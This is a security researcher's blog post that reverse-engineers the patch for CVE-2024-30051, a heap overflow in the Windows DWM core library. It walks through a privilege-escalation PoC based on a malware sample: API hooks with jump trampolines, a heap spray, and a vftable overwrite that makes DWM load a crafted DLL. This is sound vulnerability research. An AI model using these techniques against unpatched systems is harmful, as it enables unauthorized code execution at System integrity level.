Windows DWM Core Library Elevation of Privilege Vulnerability (CVE-2024-30051)
In this blog post, I explain a vulnerability in the Microsoft Windows Desktop Window Manager (DWM) Core library that I analyzed while the exploit for Core Impact was being developed. This vulnerability (CVE-2024-30051) allows an unprivileged attacker to execute code as the DWM user at System integrity level.
Since there was not enough public information at the time to develop the exploit, I had to do a significant amount of reversing. In this blog, I demonstrate how to reverse the KB5037771 patch for Windows 11 23H2 using IDA Pro. Using BinDiff to diff dwmcore.dll version 10.0.22621.3447 against version 10.0.22621.3593, I show how the heap overflow is produced. From there, I illustrate how to exploit it to elevate privileges, ending with a functional PoC.
Vulnerability Details
Title: Windows DWM Core Library Elevation of Privilege Vulnerability (CVE-2024-30051)
Released: May 14, 2024
Assigning CNA: Microsoft
Impact: Elevation of Privilege
Max Severity: Important
Weakness: CWE-122: Heap-based Buffer Overflow
CVSS 3.1: 7.8 (base) / 7.2 (temporal)
This vulnerability is caused by a size miscalculation involving an integer division in dwmcore.dll, the main Windows DWM library. A local user can trigger a heap-based buffer overflow in the CCommandBuffer::Initialize method of dwmcore.dll and execute arbitrary code as the DWM user at System integrity level. The exploit performs a heap spray in the DWM process to prepare memory and then produces a heap overflow in dwmcore.dll, whose effect is triggered by releasing certain parts of the heap spray.
Once the exploit succeeds, the DWM process loads our crafted DLL, which runs our code or our executable (in our case, a CMD) as the DWM user at System integrity level.
Let's walk through this vulnerability and see how it allows us to run as the DWM user at System integrity level. Note that since this user does not belong to the Administrators group, it has some privilege restrictions.
Diffing to Find the Bug
The patch for Windows 11 23H2 can be downloaded from:
https://www.catalog.update.microsoft.com/Search.aspx?q=KB5037771
windows11.0-kb5037771-x64_19a3f100fb8437d059d7ee2b879fe8e48a1bae42.msu
The vulnerable version of dwmcore.dll is: 10.0.22621.3447
The patched version of dwmcore.dll is: 10.0.22621.3593
Analyzing the changed functions, it's clear that the patched version of CCommandBuffer::Initialize has many added blocks, making it look quite different from the unpatched version.
Statically reversing that function reveals two calls to CD2DSharedBuffer::GetBufferSize.
The first call gets the size to allocate with new, and the second call gets the same size for the memcpy.
At first, everything seems correct. However, before the allocation, the function performs some operations on the size.
It obtains buffer_size and buffer_size2 by calling the same CD2DSharedBuffer::GetBufferSize function, and both calls return the same value. But before the new, it performs an integer division of buffer_size by 0x90 and then multiplies the result by 0x90, whereas the memcpy uses the returned buffer_size2 without any operation on it.
Because of these operations, the size finally used in the new and the size used in the memcpy can differ:
buffer_size = buffer_size2 (both returned by GetBufferSize)
size_new = (buffer_size / 0x90) * 0x90 (integer division)
size_memcpy = buffer_size2
For example, if buffer_size is 0x91:
buffer_size = buffer_size2 = 0x91
size_new = (0x91 / 0x90) * 0x90 = 0x90
size_memcpy = buffer_size2 = 0x91
This example shows the heap overflow: the memcpy copies more bytes than were allocated, and the size is controllable. The excess equals buffer_size modulo 0x90, so it can be at most 0x8f bytes.
Another example is buffer_size = 0x23f, the value used in the PoC:
buffer_size = buffer_size2 = 0x23f
size_new = (0x23f / 0x90) * 0x90 = 0x1b0
size_memcpy = buffer_size2 = 0x23f
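To double-check the arithmetic, here is a minimal C sketch of the two size computations described above. It only models the math (a rounded-down size for new, an unrounded size for memcpy); the helper names are hypothetical and do not come from dwmcore.dll.

```c
#include <stdint.h>

/* Divisor/multiplier observed in the vulnerable CCommandBuffer::Initialize. */
#define CMD_ELEMENT_SIZE 0x90u

/* Hypothetical helper: size passed to new. Integer division followed by
 * multiplication rounds the value DOWN to a multiple of 0x90. */
static uint32_t size_for_new(uint32_t buffer_size)
{
    return (buffer_size / CMD_ELEMENT_SIZE) * CMD_ELEMENT_SIZE;
}

/* Hypothetical helper: size passed to memcpy, the GetBufferSize result as is. */
static uint32_t size_for_memcpy(uint32_t buffer_size2)
{
    return buffer_size2;
}

/* Bytes written past the end of the allocation. This is
 * buffer_size % 0x90, so it never exceeds 0x8f. */
static uint32_t overflow_bytes(uint32_t buffer_size)
{
    return size_for_memcpy(buffer_size) - size_for_new(buffer_size);
}
```

For 0x23f it gives 0x1b0 for the allocation and 0x8f bytes past the end, while a size that is already a multiple of 0x90 produces no overflow at all.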
With the vulnerable function analyzed, I wanted to see how to reach CCommandBuffer::Initialize. This is where things start to get complicated.
Looking at the cross-references to this function, it appears to be reached from methods of the CPrimitiveGroup class:
The class has its own constructor:
And it is reached this way:
While working through this process, I took the time to read The Lost World of DirectComposition: Hunting Windows Desktop Window Manager Bugs to dive into the world of DirectComposition. This helped me create my first PoC.
I also needed to reverse win32k.sys, and I tried to send commands through these functions:
- NtDCompositionCreateChannel
- NtDCompositionProcessChannelBatchBuffer
- NtDCompositionCommitChannel
My first PoC reached the CPrimitiveGroup constructor. However, even after a lot of reversing, I did not find a way to drive the vftable method calls needed to reach the vulnerable function directly through ALPC using these functions.
I spent a lot of time on complicated reversing. During this process, I found a sample of the malware that exploited the vulnerability, which was immensely helpful because the exploitation method is much more complex than I initially thought. It also hooks several system APIs and uses methods that are perhaps a little questionable. But anything goes in war and exploits, so I began to analyze the malware, and from that analysis I created the final PoC that exploits the vulnerability, which I explain below.
First, I want to clarify that the malware not only exploits CVE-2024-30051 to elevate its process to System integrity level, but also performs a second stage that goes on from there to a SYSTEM user with all privileges, which is beyond the scope of the CVE explained here.
It's also important to note that the malware is much more complex than my PoC, which keeps the code to a minimum. The malware performs many more checks to ensure reliability, which is why it works on the first try. I discarded all those checks to keep things simple and focus on the exploitation itself, at the cost of perhaps having to run the PoC two or three times before it succeeds.
Analysis of the PoC exploiting CVE-2024-30051
1) Initialization
The link to the executable PoC is https://github.com/fortra/CVE-2024-30051
The PoC calls GetVersion to get the OS version it is running on and, depending on the result, initializes some global variables differently. My PoC was tested on Windows 11 23H2 and Windows 11 22H2. Other systems are vulnerable too, and I added the values needed to exploit them.
2) Hooking
It hooks four system functions; without these hooks, the exploitation cannot succeed. The functions are RtlAllocateHeap, RtlCreateHeap, NtDCompositionCreateChannel, and NtDCompositionCommitChannel.
In each of these functions, it patches the first 5 bytes so that they jump to its own code. Of course, that code cannot be very far away: a 5-byte jump cannot reach the whole address space, so the target must be nearby.
To do this, the malware uses lengthy code that analyzes the memory map to decide where it can allocate its own code. Since that code is complicated, I reduced it to two simple lines:
- base_ntdll = (char *)GetModuleHandleW(L"ntdll.dll");
- global4_ = (char *)VirtualAlloc(base_ntdll - 0x2000, 0x1000, MEM_COMMIT | MEM_RESERVE /* 0x3000 */, PAGE_EXECUTE_READWRITE /* 0x40 */);
I subtract 0x2000 from the ntdll base address and pass the result to VirtualAlloc so that the allocation is made there.
In 64-bit processes, DLLs are mapped far apart from each other in memory, with empty gaps between them.
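Why the hook code must be near the hooked function can be made concrete. A 5-byte JMP is the opcode E9 followed by a signed 32-bit displacement counted from the end of the instruction, so its target must lie within about ±2 GB of the patch site. The C sketch below works on plain integer addresses and uses hypothetical helper names; it only computes the displacement and the 5 patch bytes and does not touch process memory.

```c
#include <stdbool.h>
#include <stdint.h>

#define JMP_REL32_LEN 5 /* opcode E9 + 4-byte displacement */

/* The displacement is measured from the address of the NEXT instruction. */
static int64_t rel32_displacement(uint64_t from, uint64_t to)
{
    return (int64_t)(to - (from + JMP_REL32_LEN));
}

/* Hypothetical helper: true if a JMP rel32 at `from` can reach `to`. */
static bool rel32_reachable(uint64_t from, uint64_t to)
{
    int64_t disp = rel32_displacement(from, to);
    return disp >= INT32_MIN && disp <= INT32_MAX;
}

/* Hypothetical helper: fills `out` with the 5 patch bytes for a JMP from
 * `from` to `to`. Returns false, leaving `out` untouched, if out of range. */
static bool encode_jmp_rel32(uint8_t out[JMP_REL32_LEN], uint64_t from, uint64_t to)
{
    if (!rel32_reachable(from, to))
        return false;
    uint32_t disp = (uint32_t)(int32_t)rel32_displacement(from, to);
    out[0] = 0xE9;
    for (int i = 0; i < 4; i++)
        out[1 + i] = (uint8_t)(disp >> (8 * i)); /* little-endian, as on x86-64 */
    return true;
}
```

For instance, a hook page placed 0x2000 bytes below the patch site is easily reachable (displacement -0x2005, encoded as E9 FB DF FF FF), while a target 4 GB away is not, which is why the allocation is placed right next to ntdll.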
Let's see how the hooks work:
It calls a hooking function that hooks the RtlAllocateHeap API. This function takes three arguments; the first, sym_RtlAllocateHeap, is the address of the API to be patched.
Before patching, it points to the start of the API:
Here is the RtlAllocateHeap function:
The second argument is the routine, named hook, that will be executed once the API has been patched:
The hook function calls my_RtlAllocateHeap.
The hooking function will patch the first 5 bytes of the API so that it jumps to hook.
It calls the code in the allocated area, which executes the first API instruction that was overwritten by the 5 bytes and then jumps to RtlAllocateHeap+5, right after the patched bytes:
This is how the API looks after hooking. The first 5 bytes have changed so that it jumps to hook. hook then calls my_RtlAllocateHeap, the code just above, which returns to the area marked in purple to continue executing the API:
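The trampoline described above (the overwritten bytes, followed by a jump back to RtlAllocateHeap+5) can be modeled as a byte layout. This is a simplified sketch under stated assumptions: the overwritten instruction bytes are exactly 5 long and position-independent, and the trampoline lies within rel32 range of the API. Real hooking code has to decode instructions to decide how many bytes to relocate, and build_trampoline is a hypothetical name, not a function from the PoC.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PATCH_LEN 5 /* bytes overwritten by the E9 rel32 hook jump */

/* Hypothetical helper: writes into `tramp` (which lives at tramp_addr) the
 * original 5 bytes of the API followed by a JMP rel32 back to
 * api_addr + PATCH_LEN. Returns the trampoline length, or 0 if the jump
 * back is out of rel32 range. */
static size_t build_trampoline(uint8_t *tramp, uint64_t tramp_addr,
                               const uint8_t stolen[PATCH_LEN], uint64_t api_addr)
{
    uint64_t jmp_at = tramp_addr + PATCH_LEN; /* where the jump back is placed */
    uint64_t resume = api_addr + PATCH_LEN;   /* first byte after the patch */
    int64_t disp = (int64_t)(resume - (jmp_at + 5));

    if (disp < INT32_MIN || disp > INT32_MAX)
        return 0;

    memcpy(tramp, stolen, PATCH_LEN);         /* replay the overwritten bytes */
    uint32_t u = (uint32_t)(int32_t)disp;
    tramp[PATCH_LEN] = 0xE9;
    for (int i = 0; i < 4; i++)
        tramp[PATCH_LEN + 1 + i] = (uint8_t)(u >> (8 * i)); /* little-endian */
    return PATCH_LEN + 5;
}
```

Executing the trampoline therefore behaves like the first 5 bytes of the original API and then continues at API+5, which is what lets the hooked function still perform the real allocation.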
When the API finishes executing, it returns to hook. From there, hook compares the global variable heap_base (which is initially zero) with the first argument passed to RtlAllocateHeap:
The code waits for one special allocation that uses a specific HeapHandle. Initially heap_base is zero, and as long as it stays zero, hook skips the check and behaves like a normal RtlAllocateHeap:
The HeapHandle value is captured inside RtlCreateHeap, which happens to be the second hooked API.
Looking for references to the global variable heap_base shows that its value only changes in hook2, the function executed when the hooked RtlCreateHeap is called:
So, the idea is to capture a certain HeapHandle and save it in heap_base. Once heap_base is nonzero, hook starts comparing every allocation against it, and the PoC saves the address of the allocation whose HeapHandle matches the stored one.
When that happens, it saves the address of the allocation in the variable named base:
These first two hooks are now chained. When hook2 saves the expected value of HeapHandle, it activates the hook function that will save the allocation address which uses the same HeapHandle.
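The chaining between hook2 and hook can be modeled as a tiny state machine. The sketch below is a hypothetical, platform-independent model: heap handles and chunk addresses are plain integers, on_create_heap stands in for hook2 and on_allocate for hook, and only the globals heap_base and base come from the text. The condition the PoC uses to decide which HeapHandle to capture is not modeled, so on_create_heap simply records whatever handle it receives.

```c
#include <stdint.h>

/* Globals mirroring the PoC's heap_base and base. */
static uintptr_t heap_base = 0; /* HeapHandle captured by hook2; 0 = not armed */
static uintptr_t base = 0;      /* chunk address captured by hook */

/* Hypothetical stand-in for hook2 (RtlCreateHeap): store the HeapHandle. */
static void on_create_heap(uintptr_t heap_handle)
{
    heap_base = heap_handle;
}

/* Hypothetical stand-in for hook (RtlAllocateHeap), run after the real
 * allocation returns: keep the chunk only if it came from the captured heap.
 * While heap_base is 0, every allocation is ignored. */
static void on_allocate(uintptr_t heap_handle, uintptr_t chunk)
{
    if (heap_base != 0 && heap_handle == heap_base)
        base = chunk;
}
```

Allocations made before hook2 fires, or from other heaps, leave base untouched; only an allocation from the captured heap updates it.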
The third hook is placed on NtDCompositionCreateChannel. The first time it is called, it saves the MappedAddress, which is the content of the third argument. It then sets hooked_flag to 1, so from then on it no longer saves anything and works normally.
The address saved in the variable base will be read three times later on. Two of those reads occur in the last hook, called hook4:
The hook4 function, placed on NtDCompositionCommitChannel, is analyzed later because it is quite complex and very important.
3) Creating the Window
After the four hooks are in place, it returns to the main function to start creating a window. It first calls RegisterClassExW, which registers a window class for subsequent use in calls to CreateWindowExW.
It then initializes the COM library for use by the calling thread by calling CoInitializeEx:
It calculates the required size of the window rectangle, based on the desired size:
The function CreateWindowExW is called to create a window that will be drawn:
4) Create Device
Next, it calls D3D11CreateDevice to create a Direct3D device that represents the display adapter:
In my PoC, ppDevice is named d3dDevice and ppImmediateContext is named d3dContext:
The Flags argument needs to be set to 0x20 (D3D11_CREATE_DEVICE_BGRA_SUPPORT), which is required for Direct2D interoperability:
Then call AddRef:
This increments the reference counter for an interface pointer to a COM object:
The value 0x10 is subtracted from THIS:
At offset 0xf8 from ID3D11Device-0x10, there is a pointer to a TComObject:
This becomes the new THIS, and execution ends up jumping to TComObject::AddRef:
Finally, it adds one to the object counter at offset 8 of the TComObject:
Then AddRef is called on the other object created by D3D11CreateDevice, of type ID3D11DeviceContext, to increase its counter:
In this case, to find the new THIS, it subtracts 0x108:
It jumps here, where the new THIS is at offset 0x98:
This is the counter. In this example, it's a QWORD:
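The pointer adjustments in this step (subtract a fixed delta from the interface pointer, load the real object from a field, then increment a counter inside it) can be reproduced on a fake in-memory layout. The offsets 0x10, 0xf8 and 8 are the ones observed above for ID3D11Device; the buffers are a hypothetical stand-in for the real d3d11.dll objects, add_ref_via is an invented helper name, and treating the TComObject counter as 64-bit is an assumption.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical model of the AddRef path observed for ID3D11Device:
 *   outer = iface - adjust          (this-adjustment, 0x10 above)
 *   inner = *(outer + inner_off)    (pointer to the TComObject, 0xf8 above)
 *   ++*(inner + refcount_off)       (counter, offset 8 above; 64-bit assumed)
 * memcpy is used so the fields do not need to be aligned. */
static uint64_t add_ref_via(uint8_t *iface, size_t adjust,
                            size_t inner_off, size_t refcount_off)
{
    uint8_t *outer = iface - adjust;
    uint8_t *inner;
    uint64_t count;

    memcpy(&inner, outer + inner_off, sizeof inner);
    memcpy(&count, inner + refcount_off, sizeof count);
    count++;
    memcpy(inner + refcount_off, &count, sizeof count);
    return count; /* new reference count */
}
```

Starting from a counter of 1, calling add_ref_via(device + 0x10, 0x10, 0xf8, 8) on such a layout returns 2, mirroring the single increment seen in the debugger.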
5) Create Factory
The PoC calls D2D1CreateFactory to use Direct2D and create the ID2D1Factory interface, which is used to create other Direct2D resources for drawing or describing shapes:
The riid argument is the one suggested by the Microsoft page:
These are the ones the malware uses:
The right one for ID2D1Factory can be found here:
https://github.com/apitrace/dxsdk/blob/master/Include/d2d1_1.h
Since I am not an expert in DirectComposition, I followed the same steps as the malware.
The returned factory has no detailed type; it is declared as void *, which suggests that it is not officially documented:
When I don't know an object's type, as in this case, I write a small executable that uses it so I can easily inspect it in memory:
Set breakpoints in the four hook functions. Here, a breakpoint in hook2 shows when it captures the HeapHandle:
The debugger should also stop in hook when the desired chunk is captured:
Set breakpoints in the other two hooks as well:
Then it calls QueryInterface:
https://help.solidworks.com/2020/english/api/sldworksapi/queryinterface_example_cplusplus_com.htm
https://github.com/tpn/winsdk-10/blob/master/Include/10.0.16299.0/shared/dxgi.idl
QueryInterface performs a kind of dynamic cast. If the ID3D11Device object supports the IDXGIDevice interface (its methods, etc.), it returns a pointer through which the same underlying object can be used as the new type, rather than a copy of the object. In this case, the variable d3dContext1 is of type IDXGIDevice:
Both inherit from CLayeredObject<Cdevice>.
The original ID3D11Device:
And the pointer that QueryInterface returns:
Then it creates an ID2D1Device object with the function CreateDevice:
In value2 it returns an object of type ID2D1Device.
6) Create a Device Context
At this point, the PoC creates a new device context from the Direct2D device using CreateDeviceContext:
Here it is implemented in the PoC:
7) Create a Composition Device
Then call DCompositionCreateDevice:
The IID belongs to _IDCompositionDevice:
8) Calling DCompositionCreateDevice Function
When stepping over DCompositionCreateDevice, execution stops at hook3, because DCompositionCreateDevice calls NtDCompositionCreateChannel:
This way, the hook captures the MappedAddress that the system uses internally when DCompositionCreateDevice is called:
This is the call stack up to this point:
This is where the dcomp module calls NtDCompositionCreateChannel:
9) Creating a Target for the HWND
After returning from the previous step, the MappedAddress is saved. The composition channel communicates with the DWM process over ALPC, and the PoC then calls CreateTargetForHwnd:
It passes the HWND of the window created earlier. The target is associated with the composition device just created, which is the THIS of this method:
10) Creating Surface
Next, call CreateSurface:
11) Calling BeginDraw, EndDraw, and CreateVisual
From there, the PoC calls BeginDraw and EndDraw, and then reaches CreateVisual.
First, call BeginDraw. This uses the IID _IDXGISurface:
Then, call EndDraw.
12) Calling Visual SetContent
Next, it calls IDCompositionVisual::SetContent:
And it calls SetRoot:
The documentation does not specify the type of the updateObject returned by BeginDraw.
13) Release Objects
Next, it releases the previously created objects:
14) Commit Composition Device
Then, using the same dcompDevice object of type IDCompositionDevice, it calls the Commit method:
15) Calling hook2
Calling Commit stops in hook2, which captures the desired HeapHandle:
This is the call stack now:
Remember that the vulnerable function can be reached through some methods of the CPrimitiveGroup class. At this point, a heap is created, and hook2 captures and saves its HeapHandle.
16) Calling the Function Hook
Before returning to main, Commit also allocates a chunk using RtlAllocateHeap. That allocation is caught and stored in the base variable inside the hook function:
The heap creation and the allocation are performed one right after the other:
Both (Allocate and Create) are called from DirectComposition::Cdevice::Commit:
17) Calling the Function hook4
After that, when NtDCompositionCommitChannel is called, it stops at hook4:
NtDCompositionCommitChannel is called from here:
It is also called from DirectComposition::Cdevice::Commit:
It is worth mentioning that, by this point, the system has already batched the commands to be sent to DWM over ALPC, and it sends them using NtDCompositionCommitChannel.
The function hook4 intercepts the NtDCompositionCommitChannel calls and at this point more commands will be added to the batch.
Let's see what hook4 does.
hook4 loops through the chunk pointed to by base.
It exits the loop when it finds the value 0x120 inside the chunk:
It stores the address and the offset where 0x120 value was located:
It overwrites the 0x120 value with value4, which is equal to 0x1b0 + 0x8f = 0x23f. This is the size that it will use in memcpy when it overflows:
It adds 0xbc + 0x90 to the address where the 0x120 value was located:
Remember that the 0x120 size was at offset 0x48 from base. Since that value was overwritten with 0x23f, the original chunk size must have been 0x120:
The source is the address of the 0x23f value plus 0x2c:
It initially added 0x90 but then subtracts 0x90 again.
The destination is the address of the former 0x120 value plus 0xbc:
It will write here:
All the writes therefore stay inside the chunk:
It then repeats the loop 3 times, which is the result of the integer division 0x1b0 / 0x90:
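The search-and-patch step at the start of hook4 can be sketched as follows. This is a hypothetical reconstruction limited to what is described above: scan the captured chunk for the first 0x120 value, replace it with 0x1b0 + 0x8f = 0x23f, and derive the loop count as 0x1b0 / 0x90. It assumes the size is stored as a 32-bit little-endian value at a 4-byte-aligned offset, and it does not model the copies that follow; the function names are invented.

```c
#include <stddef.h>
#include <stdint.h>

#define ORIGINAL_SIZE 0x120u /* value hook4 searches for */
#define ALLOC_SIZE    0x1b0u /* size the vulnerable code will allocate */
#define MAX_EXTRA     0x8fu  /* largest possible remainder modulo 0x90 */
#define CMD_UNIT      0x90u

static uint32_t read_u32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void write_u32le(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}

/* Hypothetical helper: replaces the first 0x120 in the chunk with
 * 0x1b0 + 0x8f. Returns the offset patched, or -1 if none was found. */
static long patch_size_field(uint8_t *chunk, size_t len)
{
    for (size_t off = 0; off + 4 <= len; off += 4) {
        if (read_u32le(chunk + off) == ORIGINAL_SIZE) {
            write_u32le(chunk + off, ALLOC_SIZE + MAX_EXTRA); /* 0x23f */
            return (long)off;
        }
    }
    return -1;
}

/* Loop count described in the text: 0x1b0 / 0x90 = 3. */
static unsigned copy_iterations(void)
{
    return ALLOC_SIZE / CMD_UNIT;
}
```

With the 0x120 value at offset 0x48 of the chunk, as described above, patch_size_field reports offset 0x48 and leaves 0x23f in its place.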
Next, because ArgChannelHandle is the same channel that was used when the MappedAddress was captured, the PoC adds commands to the batch using NtDCompositionProcessChannelBatchBuffer. These are processed along with the commands the system had already added: the batch collects them all, and they are sent together using NtDCompositionCommitChannel:
The command sent has the value 8, which corresponds to SetResourceIntegerProperty, for 4 different trackers (1, 2, 3, and 4).
18) Performing Heap Spray
When the PoC returns to the main function, it creates a different channel to perform the heap spray.
It batches 0x10000 commands, which are sent with _NtDCompositionCommitChannel:
Each command uses CreateResource (value 1) with the resource type 0x50, which corresponds to CHolographicInteropTextureMarshaler:
The allocations are performed in the code below. The size of the objects created for the spray is 0x1b0:
It then runs a loop that releases some of the objects created in the previous step, making holes in the heap layout.
The variable counter2 starts at 0x3000 and is incremented in steps of 0x20 while it is less than 0x7000, which gives (0x7000 - 0x3000) / 0x20 = 0x200 iterations:
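The hole-making loop is a simple stride. Assuming counter2 identifies the sprayed resource to release (the text does not say exactly how it maps to a resource), the loop frees every 0x20th id from 0x3000 up to 0x6fe0, which is 0x200 objects. In this sketch, release_fn and record_release are hypothetical placeholders for the actual release command; they only record which ids would be released.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical callback standing in for the command that releases one
 * sprayed resource; the real release mechanism is not modeled here. */
typedef void (*release_fn)(uint32_t id, void *ctx);

/* Mirrors the counter2 loop: releases 0x3000, 0x3020, ..., 0x6fe0. */
static size_t punch_holes(release_fn release_resource, void *ctx)
{
    size_t freed = 0;
    for (uint32_t counter2 = 0x3000; counter2 < 0x7000; counter2 += 0x20) {
        release_resource(counter2, ctx);
        freed++;
    }
    return freed;
}

/* Example callback that only records which ids would be released. */
struct hole_stats {
    size_t count;
    uint32_t first;
    uint32_t last;
};

static void record_release(uint32_t id, void *ctx)
{
    struct hole_stats *s = ctx;
    if (s->count == 0)
        s->first = id;
    s->last = id;
    s->count++;
}
```

Running punch_holes(record_release, &stats) reports 0x200 releases, the first at 0x3000 and the last at 0x6fe0.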
19) Modifying the Base Chunk Before Sending
It fills memory with the byte 0x41 ('A') starting at the chunk address base + 0x48 + 44 (0x2c) + 0x1b0.
That is, it writes the values that will be used later, when the overflow overwrites the adjacent chunk:
That pvalue7 is located at offset 0x224 from base (0x48 + 0x2c + 0x1b0 = 0x224):
Then it calls the function “escribe” (Spanish for “writes”):
It writes pKernelCallbacktable plus 0x388, the LoadLibraryA address, and the path of the DLL to load, which in this case I named s11.dll.
20) Debugging the DWM Process
Now, a kernel debugger is needed to stop at the vulnerable function when the heap overflow occurs, because the DWM process cannot be debugged with a user-mode debugger.
Using IDA Pro to debug the target remotely, set a conditional breakpoint that stops when the size equals 0x1b0:
# IDAPython breakpoint condition: log the size in RAX, break only on 0x1b0
print("VALUE1 %x" % cpu.rax)
return cpu.rax == 0x1b0
Since a user-mode process is being debugged from the kernel, you need to switch to the DWM process context before setting the breakpoint. Reload the user-mode symbols with:
.reload /user
Then force an immediate reload of all symbols, including the kernel's, with:
.reload /f
It stops when ShowWindow is stepped over in the PoC:
It allocates with size 0x1b0 and copies with size 0x23f, producing the heap overflow:
At this point the call stack looks like this:
DWM receives the values that produce the overflow in the code below.
The crafted values in base sent by my PoC are read by the DWM process, in the dwmcore.dll module, using MapViewOfFile:
The previous function is called from:
It stops here when the batch is sent over ALPC from hook4 through destination_copy (NtDCompositionCommitChannel):
Remember that hook4 added commands to the batch. However, the system had already added some commands of its own, including the base and the crafted data:
In this case, the shared memory area starts at 000001cd'178d0000. When it is used as the source of the memcpy, the data is 0x794 bytes into that same area.
The size of the shared memory area is 0x4000:
It will stop when the size to be allocated is 0x1b0, and reaches the memcpy to copy 0x23f bytes:
Beyond the first 0x1b0 bytes are the data that will overflow and overwrite the adjacent block:
When the PoC releases the chunks, execution ends by jumping to LoadLibraryA, which loads the crafted library:
That comes from here:
The heap spray was made with 0x1b0-byte objects of type CHolographicInteropTexture.
Since the PoC had made holes in the heap by releasing some of these objects, and the block that is going to overflow is also 0x1b0 bytes in size, that block has a high probability of landing in one of those holes.
At the destination of the memcpy the blocks are located every 0x1b0 bytes:
The pointer to a vftable is overwritten by the pointer to LoadLibrary.
Before overwriting:
After overwriting:
Remember that execution ended by jumping to [R11+50], which is the pointer to LoadLibraryA.
21) Elevating Privileges to Integrity System Level
Before executing the PoC, copy the DLL to the path specified in the PoC:
After executing the PoC, a CMD process runs as the DWM user at System integrity level:
References:
PoC at Fortra GitHub: https://github.com/fortra/CVE-2024-30051
Official CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30051
Vulnerability Advisory: https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-30051
This completes the PoC. Note that if you execute it many times, the heap will be left in an unstable state, so you may need to restart the machine to make it work again. Also, while it may not work on the first attempt, it typically works on the second or third. As you can see, reversing can be difficult, so if you have any questions, feel free to contact me.
X: @ricnar456